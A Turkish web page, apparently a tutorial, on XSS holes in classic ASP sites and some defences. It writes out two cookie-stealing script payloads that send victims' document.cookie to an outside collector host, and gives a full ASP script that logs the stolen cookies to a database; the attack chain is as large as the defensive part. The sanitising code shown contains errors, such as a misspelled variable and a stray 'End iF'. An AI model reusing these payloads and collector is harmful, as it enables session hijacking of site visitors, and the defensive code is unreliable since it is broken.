A
B
C
Ç
D
E
F
G
Ğ
H
I
İ
J
K
L
M
N
O
P
R
S
Ş
T
U
Ü
V
Y
Z
Q
W
X
+ Ekle
XSS Açıkları Ve Korunma Yöntemleri

XSS Açıkları Ve Korunma Yöntemleri XSS Açıkları ve Korunma Yöntemleri

 

XSS Açıkları Request ile kullanıcıdan alınan verilerin sayfa içinde Yazdırılması ile oluşur. Örneğin QueryString ile alınan sayfa numaraları yada ilgili kaydı gösteren id değişkenleri.
http://www.hedefsite/Default.Asp?Page=1 yada http://www.hedefsite/Product.Asp?id=1
http://www.hedefsite/Default.Asp?Kategori=Haber gibi.

Örnek XSS Açığı ile Ne yapılabilir :

Yukardaki örnekler gibi açığımızı buluyoruz yada hedef sitede Webservis sayaç kodunun olması yeterli.
Açığımızı bulduktan sonra kullanıcının Cookie’sini JavaScript (document.cookie) ile okuyup istediğimiz bir adresteki veri tabanına kayıt ediyoruz yada kendimize mail atıyoruz.

-------------------------
http://www.hedefsite.com/Default.Asp?Page=2"><SCRIPT>location.href= "http://www.cyber-warrior.org/yakala.asp?X=’+escape(document.cookie)</SCRIPT>
-------------------------

Saldırgan Url’nin sonuna "> Eklentisi ile Inputların sonlandırılmasını ve bundan sonra eklenen zararlı kodları Explorer’ın icra etmesini sağlar.
Bu Link’e tıklayan kullanıcının Cookie’si Belirtilen Kaynağa Post edilir.

Yada : Hedef sitede yazdığınız mesajı gösterebilecek uygulamalar var ise ziyaretçi defteri, forum vb. uygulama
----------------------------
<script>document.location=’http://www.cyber-warrior.org/yakala.asp?X=’ +document.cookie</script>
----------------------------
Bu kod ilgili sayfada görüntülendiği anda sayfayı görüntüleyen kullanıcıların cookielerini alarak yakala.asp dosyasına veri tabanına kaydetmesi için gönderir.

Web Sayfanızda XSS açıkları kapatılmış Olsada, Webservis Sayac kodu var ise bu sayesinde XSS Açığı Oluşuyor.
WebServis Tarafından verilen ve Sitenize eklediğiniz;

------------------------------------
<script language="javascript"> var  wuser="CWDoktoray", wbanner=11;</script>
<script language="javascript" src= "a target=_blank href=http://www.webservis.gen">http://www.webservis.gen.tr/sayac.js"></script>
-------------------------------------

 

XSS Açıklarını Engellemek için:

Request ile alınan değerleri her zaman QueryString’de olsa Replace ile Aşağıdaki şekilde temizleyin

Ve Request verilerini alırken mutlaka tam sayıya çevirin

Recid = CInt(Trim(Server.HTMLEncode("Recid")))

Recid = Replace(Recid, "<" , "&lt;")   ’küçüktür
Recid = Replace(Recid, ">" , "&gt;")   ’büyüktür
Recid = Replace(Recide, "’" , "&#146;")   ’tek tırnak
Recid = Replace(Recid, Chr(10) , "") ’Satır Başı
Recid = Replace(Recid, Chr(34) , "") ’çift tırnak

---------------------------------------------------

ASP.NET ’de

web.config Dosyasında aşağıdaki değişikleri yaptığınızda " ’ "

 gibi karakterleri sistem kendisi kontrol eder. Bu Sayede hemen hemen hiçbir XSS ve SQL Enjeksiyon teknikleri Etkili olmaz

<System.Web>

<Pages validateRequest="True"></Pages>

</System.Web>


IPS Kullanıyor iseniz

Yeni imza yaratıp

Application Layer / HTTP / HTTP.URL_DECODED
Protokolüne;
 
’ Tek Tırnak,
" Çift Tırnak
< Küçük
> Büyük

Karakterlerini ekleyerek XSS ve SQL Enjeksiyon Saldırılarını Direkt Engelleyebilirsiniz...

----------------------------------------------------------------------------------

Yakala.ASP’den Gelen Verileri yakalamak ve Veritabanına kaydetmek için

Örnek Basit bir ASP Dosyası

X = Request.QueryString("X") Yerine
Veri URL’den geleceği için
X = Request.ServerVariables("HTTP_REFERER") de Kullanabilirsiniz.

"Yakala.mdb" adında bir database oluşturun "tblYakala" adında bir tablo ve "Sayfa" Adında (alan tipi Not) Oalcak şekilde Tasarlayın

--------------------Yakala.Asp-----------------------------------

<%
Dim X
X = Request.QueryString("X")
%>

<%
Dim ConnString,bag
ConnString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & server.mappath("Yakala.mdb") & ";"
set bag = Server.CreateObject("ADODB.Connection")
bag.Open ConnString
%>

<%
Dim SQL,Rs
Set Rs=Server.CreateObject("ADODB.Recordset")
SQL="Select * From tblYakala"
Rs.Open SQL,ConnString,1,3
End iF
%>

<%
Rs.AddNew
Rs("Sayfa")=X
Rs.Update
Rs.Close
%>


 • diline pelesenk olmak ne demek
 • dillere pelesenk olmuş ne demek
 • pelesenk
 • pelesenk ne demek
 • Pelesenk Ne Demek – Pelesenk Sözlük Anlamı
 • pelesenk olmak ne demek
 • pelesenk olmak ne demektir
 • pelesenk olmuş ne demek
 • Yüksek Yüksek Tepelere sözleri
 •   Ad Soyad
    Yorum